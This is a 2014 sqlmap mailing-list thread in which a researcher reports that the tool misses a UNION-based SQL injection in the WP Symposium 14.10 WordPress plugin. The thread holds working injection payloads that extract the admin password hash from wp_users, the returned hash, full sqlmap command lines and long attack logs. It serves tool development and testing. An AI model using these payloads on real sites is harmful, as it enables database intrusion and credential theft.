Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
|
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:46:14
|
Sorry, one more thing to note, the following command gets very close to
exploiting the injection:
./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
/tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
LIMIT 1,1#" --union-char=f --prefix='in_deleted '
The only problem is that the union-char is 'f', when I was hoping it would
be 0x66. When I capture the request and replace 'f' with 0x66, the
injection works. Looks like ' is a bad char.
On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...>
wrote:
>
> Playing with the queries sqlmap sends a bit more:
>
> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>
> This results in a 0 being returned where the password hash was in the
> successful injection:
>
> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
> ^ injection result
>
>
> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>
> This payload also results in a 0 being returned, not 'fdsa' as you would
> expect.
>
> However, this payload does return 'fdsa'
>
> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
> 1,1#&mid=1
>
> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]
>
>
> Hope this helps.
>
>
> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bpe...@gm...
> > wrote:
>>
>> Here is the console output. Attached is the traffic log in a zip:
>>
>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>> _
>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>> |_ -| . | | | .'| . |
>> |___|_ |_|_|_|_|__,| _|
>> |_| |_| http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 08:56:27
>>
>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>> [08:56:27] [INFO] setting file for logging HTTP traffic
>> [08:56:27] [INFO] flushing session file
>> [08:56:27] [INFO] testing connection to the target URL
>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>> couple of seconds
>> [08:56:28] [INFO] target URL is stable
>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>> 'tray' might not be injectable
>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause (MySQL comment)'
>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause (Generic comment)'
>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> clause'
>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> clause (MySQL comment)'
>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>> clause (Generic comment)'
>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>> ORDER BY or GROUP BY clause (RLIKE)'
>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>> replace (original value)'
>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>> (MAKE_SET - original value)'
>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>> (ELT - original value)'
>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>> (bool*int - original value)'
>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
>> replace (original value)'
>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>> replace (original value)'
>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>> ORDER BY clauses'
>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>> ORDER BY clauses (original value)'
>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>> and ORDER BY clauses'
>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and
>> ORDER BY clauses'
>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
>> clause (EXTRACTVALUE)'
>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
>> clause (UPDATEXML)'
>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING
>> clause (BIGINT UNSIGNED)'
>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING
>> clause'
>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
>> clause'
>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>> clause (EXTRACTVALUE)'
>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>> clause (UPDATEXML)'
>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
>> clause (BIGINT UNSIGNED)'
>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
>> clause'
>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>> (EXTRACTVALUE)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>> (UPDATEXML)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
>> (BIGINT UNSIGNED)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER
>> BY clauses'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>> BY clauses (EXTRACTVALUE)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>> BY clauses (UPDATEXML)'
>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER
>> BY clauses (BIGINT UNSIGNED)'
>> [08:58:08] [INFO] testing 'MySQL inline queries'
>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>> query)'
>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
>> time-based blind (heavy query)' injectable
>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>> [08:58:26] [INFO] automatically extending ranges for UNION query
>> injection technique tests as there is at least one other (potential)
>> technique found
>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>> columns'
>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
>> columns'
>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
>> columns'
>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
>> columns'
>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
>> columns'
>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
>> columns'
>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40
>> columns'
>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60
>> columns'
>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80
>> columns'
>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>> 100 columns'
>> [08:58:54] [INFO] checking if the injection point on POST parameter
>> 'tray' is a false positive
>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>> others (if any)? [y/N] n
>> sqlmap identified the following injection points with a total of 2049
>> HTTP(s) requests:
>> ---
>> Parameter: tray (POST)
>> Type: AND/OR time-based blind
>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>> Payload: action=getMailMessage&tray=in_deleted AND
>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>> ---
>> [08:59:48] [INFO] testing MySQL
>> [08:59:48] [WARNING] it is very important not to stress the network
>> adapter during usage of time-based payloads to prevent potential errors
>> do you want sqlmap to try to optimize value(s) for DBMS delay responses
>> (option '--time-sec')? [Y/n]
>> [08:59:51] [INFO] confirming MySQL
>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
>> times
>> [08:59:53] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: Apache 2.4.7, PHP 5.5.9
>> back-end DBMS: MySQL >= 5.0.0
>> [08:59:53] [INFO] fetched data logged to text files under
>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>
>> [*] shutting down at 08:59:53
>>
>> bperry@ubuntu:~/tools/sqlmap$
>>
>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>>
>>> Hi.
>>>
>>> I don't see a reason why this form of UNION test would be any different
>>> than the regular used by sqlmap. Can you please send me the traffic file
>>> for such run (... --flush-session -t traffic.txt) along with console
>>> output?
>>>
>>> Bye
>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>>> wrote:
>>>
>>>> Hello!
>>>>
>>>> Playing around with the following vulnerabivlity:
>>>>
>>>> http://www.exploit-db.com/exploits/35505/
>>>>
>>>>
>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>> does result in a response from the server with the hash of the first user:
>>>>
>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>
>>>>
>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>
>>>> Just a thought!
>>>>
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>> more
>>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>>
>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
